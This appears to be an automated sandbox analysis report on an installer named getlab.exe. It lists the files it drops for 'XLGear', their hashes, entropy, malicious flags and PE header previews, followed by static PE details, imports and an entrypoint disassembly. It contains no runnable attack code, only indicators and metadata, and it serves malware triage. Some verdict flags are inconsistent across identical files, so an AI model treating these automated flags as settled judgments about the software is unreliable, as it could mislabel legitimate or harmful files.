                                                                        C:\Users\user\AppData\Local\XLGear 3.1.3.157\is-Q00OL.tmp

                                                                        Download File
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp
                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):348160
                                                                        Entropy (8bit):6.542655141037356
                                                                        Encrypted:false
                                                                        SSDEEP:6144:OcV9z83OtqxnEYmt3NEnvfF+Tbmbw6An8FMciFMNrb3YgxxpbCAOxO2ElvlE:Ooz83OtIEzW+/m/AyF7bCrO/E
                                                                        MD5:86F1895AE8C5E8B17D99ECE768A70732
                                                                        SHA1:D5502A1D00787D68F548DDEEBBDE1ECA5E2B38CA
                                                                        SHA-256:8094AF5EE310714CAEBCCAEEE7769FFB08048503BA478B879EDFEF5F1A24FEFE
                                                                        SHA-512:3B7CE2B67056B6E005472B73447D2226677A8CADAE70428873F7EFA5ED11A3B3DBF6B1A42C5B05B1F2B1D8E06FF50DFC6532F043AF8452ED87687EEFBF1791DA
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........2..S..S..S..Tp..S..S..5S..BX..S..BX...S..BX..Q..BX..S..BX..S..BX..S..Rich.S..........................PE..L.....V>...........!................."............4|.........................`......................................t....C......(.... .......................0..d+..H...8...........................x...H...............l............................text............................... ..`.rdata..@...........................@..@.data... h.......`..................@....rsrc........ ......................@..@.reloc..d+...0...0... ..............@..B........................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\XLGear 3.1.3.157\is-S3UFM.tmp

                                                                        Download File
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):3397185
                                                                        Entropy (8bit):6.501948936593034
                                                                        Encrypted:false
                                                                        SSDEEP:49152:Icpp64wB/nwOGSXpzopPdJTp19zxJwBv1g58fR:ISp61nRx5zopPdJTT9zxmw58fR
                                                                        MD5:861098E5924051934AC2F9B85677EFD9
                                                                        SHA1:B5EFBD2812ADE331443837A8365395132400108C
                                                                        SHA-256:6A6CA4E72479D68BBD99618DD2C15608C5F6257CE3D5E67F577D2021B6769A91
                                                                        SHA-512:41E58A9CF7AE965296DF22FCEF9C14D08691A382AFA050694F8EE499F8D2E3DA170F164E0F23587F8FB88C055570E43E626DA0870C01A626722E0B8E70828475
                                                                        Malicious:false
                                                                        Yara Hits:
                                                                        • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\is-S3UFM.tmp, Author: Joe Security
                                                                        Preview:.Z......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................PE..L...i..L.........................................@..........................@4.......4..................................................U...........................................................................................................stum8.............................. ..`.stun8..l...........................@..@.stuo8...d...0...2..................@....rsrc....V.......V...B..............@..@.stup8...@......A>..................`...........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\XLGear 3.1.3.157\is-VVRBT.tmp

                                                                        Download File
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp
                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):445440
                                                                        Entropy (8bit):6.439135831549689
                                                                        Encrypted:false
                                                                        SSDEEP:12288:sosmML3+OytpWFkCU1wayvT33iiDNmAE27R9sY9kP0O+:soslvJ3RaY9wU
                                                                        MD5:CAC7E17311797C5471733638C0DC1F01
                                                                        SHA1:58E0BD1B63525A2955439CB9BE3431CEA7FF1121
                                                                        SHA-256:19248357ED7CFF72DEAD18B5743BF66C61438D68374BDA59E3B9D444C6F8F505
                                                                        SHA-512:A677319AC8A2096D95FFC69F22810BD4F083F6BF55B8A77F20D8FB8EE01F2FEE619CE318D1F55C392A8F3A4D635D9285712E2C572E62997014641C36EDC060A2
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...*..=...........!.........\......@!....................................... .......................'..........................P.......H.......................l....................................................................................text............................... ..`.rdata..2$.......&..................@..@.data...............................@....idata..............................@....rsrc...H...........................@..@.reloc...&.......(..................@..B................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\XLGear 3.1.3.157\ltkrn13n.dll (copy)

                                                                        Download File
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp
                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):445440
                                                                        Entropy (8bit):6.439135831549689
                                                                        Encrypted:false
                                                                        SSDEEP:12288:sosmML3+OytpWFkCU1wayvT33iiDNmAE27R9sY9kP0O+:soslvJ3RaY9wU
                                                                        MD5:CAC7E17311797C5471733638C0DC1F01
                                                                        SHA1:58E0BD1B63525A2955439CB9BE3431CEA7FF1121
                                                                        SHA-256:19248357ED7CFF72DEAD18B5743BF66C61438D68374BDA59E3B9D444C6F8F505
                                                                        SHA-512:A677319AC8A2096D95FFC69F22810BD4F083F6BF55B8A77F20D8FB8EE01F2FEE619CE318D1F55C392A8F3A4D635D9285712E2C572E62997014641C36EDC060A2
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...*..=...........!.........\......@!....................................... .......................'..........................P.......H.......................l....................................................................................text............................... ..`.rdata..2$.......&..................@..@.data...............................@....idata..............................@....rsrc...H...........................@..@.reloc...&.......(..................@..B................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\XLGear 3.1.3.157\msvcp71.dll (copy)

                                                                        Download File
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp
                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):499712
                                                                        Entropy (8bit):6.414789978441117
                                                                        Encrypted:false
                                                                        SSDEEP:12288:fJzxYPVsBnxO/R7krZhUgiW6QR7t5k3Ooc8iHkC2eq:fZxvBnxOJ7ki3Ooc8iHkC2e
                                                                        MD5:561FA2ABB31DFA8FAB762145F81667C2
                                                                        SHA1:C8CCB04EEDAC821A13FAE314A2435192860C72B8
                                                                        SHA-256:DF96156F6A548FD6FE5672918DE5AE4509D3C810A57BFFD2A91DE45A3ED5B23B
                                                                        SHA-512:7D960AA8E3CCE22D63A6723D7F00C195DE7DE83B877ECA126E339E2D8CC9859E813E05C5C0A5671A75BB717243E9295FD13E5E17D8C6660EB59F5BAEE63A7C43
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............................................................................Rich...................PE..L.....w>...........!.................-............:|................................~e..............................$...?...d!..<....`.......................p...0..8...8...............................H............................................text............................... ..`.rdata..2*.......0..................@..@.data...h!...0... ...0..............@....rsrc........`.......P..............@..@.reloc...0...p...@...`..............@..B........................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\XLGear 3.1.3.157\msvcr71.dll (copy)

                                                                        Download File
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp
                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):348160
                                                                        Entropy (8bit):6.542655141037356
                                                                        Encrypted:false
                                                                        SSDEEP:6144:OcV9z83OtqxnEYmt3NEnvfF+Tbmbw6An8FMciFMNrb3YgxxpbCAOxO2ElvlE:Ooz83OtIEzW+/m/AyF7bCrO/E
                                                                        MD5:86F1895AE8C5E8B17D99ECE768A70732
                                                                        SHA1:D5502A1D00787D68F548DDEEBBDE1ECA5E2B38CA
                                                                        SHA-256:8094AF5EE310714CAEBCCAEEE7769FFB08048503BA478B879EDFEF5F1A24FEFE
                                                                        SHA-512:3B7CE2B67056B6E005472B73447D2226677A8CADAE70428873F7EFA5ED11A3B3DBF6B1A42C5B05B1F2B1D8E06FF50DFC6532F043AF8452ED87687EEFBF1791DA
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........2..S..S..S..Tp..S..S..5S..BX..S..BX...S..BX..Q..BX..S..BX..S..BX..S..Rich.S..........................PE..L.....V>...........!................."............4|.........................`......................................t....C......(.... .......................0..d+..H...8...........................x...H...............l............................text............................... ..`.rdata..@...........................@..@.data... h.......`..................@....rsrc........ ......................@..@.reloc..d+...0...0... ..............@..B........................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\XLGear 3.1.3.157\sqlite3.dll (copy)

                                                                        Download File
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp
                                                                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):645592
                                                                        Entropy (8bit):6.50414583238337
                                                                        Encrypted:false
                                                                        SSDEEP:12288:i0zrcH2F3OfwjtWvuFEmhx0Cj37670jwX+E7tFKm0qTYh:iJUOfwh8u9hx0D70NE7tFTYh
                                                                        MD5:E477A96C8F2B18D6B5C27BDE49C990BF
                                                                        SHA1:E980C9BF41330D1E5BD04556DB4646A0210F7409
                                                                        SHA-256:16574F51785B0E2FC29C2C61477EB47BB39F714829999511DC8952B43AB17660
                                                                        SHA-512:335A86268E7C0E568B1C30981EC644E6CD332E66F96D2551B58A82515316693C1859D87B4F4B7310CF1AC386CEE671580FDD999C3BCB23ACF2C2282C01C8798C
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....=S.v..?......!................X..............`......................... ......8......... .................................L................................'......................................................p............................text...............................`.0`.data...............................@.@..rdata..$...........................@.@@.bss..................................@..edata..............................@.0@.idata..L...........................@.0..CRT................................@.0..tls.... ...........................@.0..reloc...'.......(..................@.0B/4......`....0......................@.@B/19..........@......................@..B/35.....M....P......................@..B/51.....`C...`...D..................@..B/63..................8..............@..B/77..................F..............@..B/89..................R..

                                                                        C:\Users\user\AppData\Local\XLGear 3.1.3.157\uninstall\is-UJ38T.tmp

                                                                        Download File
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):715253
                                                                        Entropy (8bit):6.5146632006329614
                                                                        Encrypted:false
                                                                        SSDEEP:12288:B/kqO+1G7DMvrP537dzHsA6BllcOuGbnH3ERNIg9rNlQyRMh1K8xyF/:VkqZ1G7DMvrP537dzHsA6hcHGbH3EuhG
                                                                        MD5:317EF0BA2AF7B18B55096279F8FD1591
                                                                        SHA1:F7197AC8FE9FD4B5992139E65FDF68C0A4025EBB
                                                                        SHA-256:1B3AAF4CA0365009D5CD77E33397AC051F7D8AB03483A104DF025EC1B9799955
                                                                        SHA-512:ECEE1445960F5BBF7DFEF3B5AE46F278B88778A4B3CE6C590CEB53A4F310B71A336D6A3D8CC8C8D7809E1578341D1021CC44FBD881C58E62FCB96B2C36BCBCB0
                                                                        Malicious:true
                                                                        Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t........................@..............................................@..............................`%..................................................................................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS.....l................................idata..`%.......&..................@....tls.....................................rdata..............................@..P.reloc..@.... ......................@..P.rsrc...............................@..P.....................J..............@..P........................................................................................................................................

                                                                        C:\Users\user\AppData\Local\XLGear 3.1.3.157\uninstall\unins000.dat

                                                                        Download File
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp
                                                                        File Type:InnoSetup Log XLGear, version 0x30, 4806 bytes, 065367\user, "C:\Users\user\AppData\Local\XLGear 3.1.3.157"
                                                                        Category:dropped
                                                                        Size (bytes):4806
                                                                        Entropy (8bit):4.730907338717463
                                                                        Encrypted:false
                                                                        SSDEEP:96:jLnWaGn8ipV7bbr9t+eOIhma7ICSss/LnhL+I:HnWaGnVpV7KHIhxICSsAnhF
                                                                        MD5:A97193D07E3E719C3685728B02989889
                                                                        SHA1:12FFEAD8249C8D852CEDC2ED78A9D858F522F7AF
                                                                        SHA-256:86C935636E1EAE8363EABAF75294169A9C478E3C4FC3D968AD434E53397EFD8F
                                                                        SHA-512:BE9B8EDA1CD9FF7F031652BC7809C47E7E3836A9D21C339D0017C046FB48EB395BB1410C843675A5C3B002183707C960BF8D385165121D498C5CF003934ED91C
                                                                        Malicious:false
                                                                        Preview:Inno Setup Uninstall Log (b)....................................XLGear..........................................................................................................................XLGear..........................................................................................................................0...........%..................................................................................................................%........d.&......M....065367.user-C:\Users\user\AppData\Local\XLGear 3.1.3.157........... .8.... ............IFPS.............................................................................................................BOOLEAN..............TWIZARDFORM....TWIZARDFORM.........TPASSWORDEDIT....TPASSWORDEDIT...........................................!MAIN....-1..(...dll:kernel32.dll.CreateFileA..............$...dll:kernel32.dll.WriteFile............"...dll:kernel32.dll.CloseHandle........"...dll:kernel32.dll.ExitProcess........%...dll:User32.dl

                                                                        C:\Users\user\AppData\Local\XLGear 3.1.3.157\uninstall\unins000.exe (copy)

                                                                        Download File
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):715253
                                                                        Entropy (8bit):6.5146632006329614
                                                                        Encrypted:false
                                                                        SSDEEP:12288:B/kqO+1G7DMvrP537dzHsA6BllcOuGbnH3ERNIg9rNlQyRMh1K8xyF/:VkqZ1G7DMvrP537dzHsA6hcHGbH3EuhG
                                                                        MD5:317EF0BA2AF7B18B55096279F8FD1591
                                                                        SHA1:F7197AC8FE9FD4B5992139E65FDF68C0A4025EBB
                                                                        SHA-256:1B3AAF4CA0365009D5CD77E33397AC051F7D8AB03483A104DF025EC1B9799955
                                                                        SHA-512:ECEE1445960F5BBF7DFEF3B5AE46F278B88778A4B3CE6C590CEB53A4F310B71A336D6A3D8CC8C8D7809E1578341D1021CC44FBD881C58E62FCB96B2C36BCBCB0
                                                                        Malicious:true
                                                                        Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t........................@..............................................@..............................`%..................................................................................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS.....l................................idata..`%.......&..................@....tls.....................................rdata..............................@..P.reloc..@.... ......................@..P.rsrc...............................@..P.....................J..............@..P........................................................................................................................................

                                                                        C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear.chm (copy)

                                                                        Download File
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp
                                                                        File Type:MS Windows HtmlHelp Data
                                                                        Category:dropped
                                                                        Size (bytes):78183
                                                                        Entropy (8bit):7.692742945771669
                                                                        Encrypted:false
                                                                        SSDEEP:1536:Bkt2SjEQ3r94YqwyadpL1X6Dtn4afF1VowWb8ZmmUQNk3gNqCLbMsFxJse8hbpmn:mR/CYj9dp5XIyI2b/mY3gNjLbMsOaP
                                                                        MD5:B1B9E6D43319F6D4E52ED858C5726A97
                                                                        SHA1:5033047A30CCCF57783C600FD76A6D220021B19D
                                                                        SHA-256:8003A4A0F9F5DFB62BEFBF81F8C05894B0C1F987ACFC8654A6C6CE02B6213910
                                                                        SHA-512:E56D6EC9170DEBAC28BB514942F794F73D4C194D04C54EFF9227B6EE3C74BA4FCF239FFF0BB6556DC8B847FA89D382AF206A2C481C41A3510936B0A74192D2C2
                                                                        Malicious:false
                                                                        Preview:ITSF....`..........E.......|.{.......".....|.{......."..`...............x.......T.......................g1..............ITSP....T...........................................j..].!......."..T...............PMGLW................/..../#IDXHDR...F.../#ITBITS..../#IVB...N$./#STRINGS.....P./#SYSTEM..N.'./#TOPICS...F.0./#URLSTR...:.t./#URLTBL...v.D./$FIftiMain......1./$OBJINST...z.../$WWAssociativeLinks/..../$WWAssociativeLinks/Property...v../$WWKeywordLinks/..../$WWKeywordLinks/Property...r../After.jpg...4..../Auto-.hhc...^./Auto-Adjustment.htm....?./Auto-BleachTeeth.htm...z.3./Auto-Crop2Plus.htm..U.j./Auto-Emphasis.htm...w.V./Auto-EyeColor.htm...!.../Auto-EyePencil.htm..._.../Auto-EyeShadow.htm...,.3./Auto-GettingStarted.htm....Q./Auto-Lipstick.htm..R.M./Auto-Liquify.htm...-.v./Auto-Menu.htm..S.r./Auto-OrderingInformation.htm...Q.../Auto-Overview.htm..^.$./Auto-Powder.htm......./Auto-Resize.htm..s.b./Auto-Rotation.htm..?.e./Auto-Rouge.htm...=.d./Auto-SkinCare.htm...|.{./Auto-SmartPatchCosmet

                                                                        C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe

                                                                        Download File
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:modified
                                                                        Size (bytes):3397185
                                                                        Entropy (8bit):6.501949315581084
                                                                        Encrypted:false
                                                                        SSDEEP:49152:jcpp64wB/nwOGSXpzopPdJTp19zxJwBv1g58fR:jSp61nRx5zopPdJTT9zxmw58fR
                                                                        MD5:9DC53D054BB2482253850DA5D8DFF405
                                                                        SHA1:F6E82BED4CA68946DC87B172D9E9AB51AB38084A
                                                                        SHA-256:07D66DC4FF91DA57222F880EFEF718EDE491777EA387EE09D3E26B2CAAB7DDB2
                                                                        SHA-512:249A4782254286B6A0D999720FB62DCCA616AC21BD5267377514940C22FB5D1F20F12FA9E00577258DDD5EF7B782D945716A1C118BB56320309C9C7A75E77441
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe, Author: Joe Security
                                                                        Antivirus:
                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................PE..L...i..L.........................................@..........................@4.......4..................................................U...........................................................................................................stum8.............................. ..`.stun8..l...........................@..@.stuo8...d...0...2..................@....rsrc....V.......V...B..............@..@.stup8...@......A>..................`...........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        Static File Info

                                                                        General

                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Entropy (8bit):7.9979305594973775
                                                                        TrID:
                                                                        • Win32 Executable (generic) a (10002005/4) 98.86%
                                                                        • Inno Setup installer (109748/4) 1.08%
                                                                        • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                        File name:getlab.exe
                                                                        File size:3'599'599 bytes
                                                                        MD5:15bd54ed3324a464c1deb1a883e7649e
                                                                        SHA1:7a6853de5875b347fe48afb232d249e44efeb879
                                                                        SHA256:7d728e3092520965203537354ccb0798292014885aecdefe1f22a988cb67661d
                                                                        SHA512:ce9ba0c6853f6cb77f8464c6b09ecf8f0d41555025a7de720a7a2b9b822d39bccdd8798b9e40cc188bd1c943e7a347541c72258247b8a42b5a325878cc294426
                                                                        SSDEEP:49152:1vFQDY+MpR85bqkh0X/5zflc+cOqngh0Kn3aSl0OlJaHiAJ0YAVbzzqqRnSTKqNE:NFNoK/5Bkgh0K3aJOGCVdiZ/HA
                                                                        TLSH:99F53302FA9045FFE2698C75E92904124F177A6E05BEE508BA8ECE146BBEFE4D45C701
                                                                        File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                                                                        File Icon

                                                                        Icon Hash:2d2e3797b32b2b99

                                                                        Static PE Info

                                                                        General

                                                                        Entrypoint:0x409c40
                                                                        Entrypoint Section:CODE
                                                                        Digitally signed:false
                                                                        Imagebase:0x400000
                                                                        Subsystem:windows gui
                                                                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                        DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                        Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                        TLS Callbacks:
                                                                        CLR (.Net) Version:
                                                                        OS Version Major:1
                                                                        OS Version Minor:0
                                                                        File Version Major:1
                                                                        File Version Minor:0
                                                                        Subsystem Version Major:1
                                                                        Subsystem Version Minor:0
                                                                        Import Hash:884310b1928934402ea6fec1dbd3cf5e

                                                                        Entrypoint Preview

                                                                        Instruction
                                                                        push ebp
                                                                        mov ebp, esp
                                                                        add esp, FFFFFFC4h
                                                                        push ebx
                                                                        push esi
                                                                        push edi
                                                                        xor eax, eax
                                                                        mov dword ptr [ebp-10h], eax
                                                                        mov dword ptr [ebp-24h], eax
                                                                        call 00007FE7748C700Bh
                                                                        call 00007FE7748C8212h
                                                                        call 00007FE7748C84A1h
                                                                        call 00007FE7748CA4D8h
                                                                        call 00007FE7748CA51Fh
                                                                        call 00007FE7748CCE4Eh
                                                                        call 00007FE7748CCFB5h
                                                                        xor eax, eax
                                                                        push ebp
                                                                        push 0040A2FCh
                                                                        push dword ptr fs:[eax]
                                                                        mov dword ptr fs:[eax], esp
                                                                        xor edx, edx
                                                                        push ebp
                                                                        push 0040A2C5h
                                                                        push dword ptr fs:[edx]
                                                                        mov dword ptr fs:[edx], esp
                                                                        mov eax, dword ptr [0040C014h]
                                                                        call 00007FE7748CDA1Bh
                                                                        call 00007FE7748CD64Eh
                                                                        lea edx, dword ptr [ebp-10h]
                                                                        xor eax, eax
                                                                        call 00007FE7748CAB08h
                                                                        mov edx, dword ptr [ebp-10h]
                                                                        mov eax, 0040CE24h
                                                                        call 00007FE7748C70B7h
                                                                        push 00000002h
                                                                        push 00000000h
                                                                        push 00000001h
                                                                        mov ecx, dword ptr [0040CE24h]
                                                                        mov dl, 01h
                                                                        mov eax, 0040738Ch
                                                                        call 00007FE7748CB397h
                                                                        mov dword ptr [0040CE28h], eax
                                                                        xor edx, edx
                                                                        push ebp
                                                                        push 0040A27Dh
                                                                        push dword ptr fs:[edx]
                                                                        mov dword ptr fs:[edx], esp
                                                                        call 00007FE7748CDA8Bh
                                                                        mov dword ptr [0040CE30h], eax
                                                                        mov eax, dword ptr [0040CE30h]
                                                                        cmp dword ptr [eax+0Ch], 01h
                                                                        jne 00007FE7748CDBCAh
                                                                        mov eax, dword ptr [0040CE30h]
                                                                        mov edx, 00000028h
                                                                        call 00007FE7748CB798h
                                                                        mov edx, dword ptr [00000030h]

                                                                        Data Directories

                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0xd0000x950.idata
                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x110000x2c00.rsrc
                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_TLS0xf0000x18.rdata
                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                        Sections

                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                        CODE0x10000x93640x94002c410dfc3efd04d9b69c35c70921424eFalse0.6147856841216216data6.560885192755103IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                        DATA0xb0000x24c0x400d5ea23d4ecf110fd2591314cbaa84278False0.310546875data2.7390956346874638IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                        BSS0xc0000xe880x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                        .idata0xd0000x9500xa00bb5485bf968b970e5ea81292af2acdbaFalse0.414453125data4.430733069799036IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                        .tls0xe0000x80x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                        .rdata0xf0000x180x2009ba824905bf9c7922b6fc87a38b74366False0.052734375data0.2044881574398449IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                        .reloc0x100000x8b40x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                        .rsrc0x110000x2c000x2c007be6483681d9a60b92b7e93f348010e6False0.32191051136363635data4.455636105188938IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ

                                                                        Resources

                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                        RT_ICON0x113540x128Device independent bitmap graphic, 16 x 32 x 4, image size 192DutchNetherlands0.5675675675675675
                                                                        RT_ICON0x1147c0x568Device independent bitmap graphic, 16 x 32 x 8, image size 320DutchNetherlands0.4486994219653179
                                                                        RT_ICON0x119e40x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640DutchNetherlands0.4637096774193548
                                                                        RT_ICON0x11ccc0x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1152DutchNetherlands0.3935018050541516
                                                                        RT_STRING0x125740x2f2data0.35543766578249336
                                                                        RT_STRING0x128680x30cdata0.3871794871794872
                                                                        RT_STRING0x12b740x2cedata0.42618384401114207
                                                                        RT_STRING0x12e440x68data0.75
                                                                        RT_STRING0x12eac0xb4data0.6277777777777778
                                                                        RT_STRING0x12f600xaedata0.5344827586206896
                                                                        RT_RCDATA0x130100x2cdata1.1590909090909092
                                                                        RT_GROUP_ICON0x1303c0x3edataEnglishUnited States0.8387096774193549
                                                                        RT_VERSION0x1307c0x4b8COM executable for DOSEnglishUnited States0.26903973509933776
                                                                        RT_MANIFEST0x135340x560XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.4251453488372093

                                                                        Imports

                                                                        DLLImport
                                                                        kernel32.dllDeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, WideCharToMultiByte, TlsSetValue, TlsGetValue, MultiByteToWideChar, GetModuleHandleA, GetLastError, GetCommandLineA, WriteFile, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetSystemTime, GetFileType, ExitProcess, CreateFileA, CloseHandle
                                                                        user32.dllMessageBoxA
                                                                        oleaut32.dllVariantChangeTypeEx, VariantCopyInd, VariantClear, SysStringLen, SysAllocStringLen
                                                                        advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey, OpenProcessToken, LookupPrivilegeValueA
                                                                        kernel32.dllWriteFile, VirtualQuery, VirtualProtect, VirtualFree, VirtualAlloc, Sleep, SizeofResource, SetLastError, SetFilePointer, SetErrorMode, SetEndOfFile, RemoveDirectoryA, ReadFile, LockResource, LoadResource, LoadLibraryA, IsDBCSLeadByte, GetWindowsDirectoryA, GetVersionExA, GetUserDefaultLangID, GetSystemInfo, GetSystemDefaultLCID, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetFullPathNameA, GetFileSize, GetFileAttributesA, GetExitCodeProcess, GetEnvironmentVariableA, GetCurrentProcess, GetCommandLineA, GetACP, InterlockedExchange, FormatMessageA, FindResourceA, DeleteFileA, CreateProcessA, CreateFileA, CreateDirectoryA, CloseHandle
                                                                        user32.dllTranslateMessage, SetWindowLongA, PeekMessageA, MsgWaitForMultipleObjects, MessageBoxA, LoadStringA, ExitWindowsEx, DispatchMessageA, DestroyWindow, CreateWindowExA, CallWindowProcA, CharPrevA
                                                                        comctl32.dllInitCommonControls
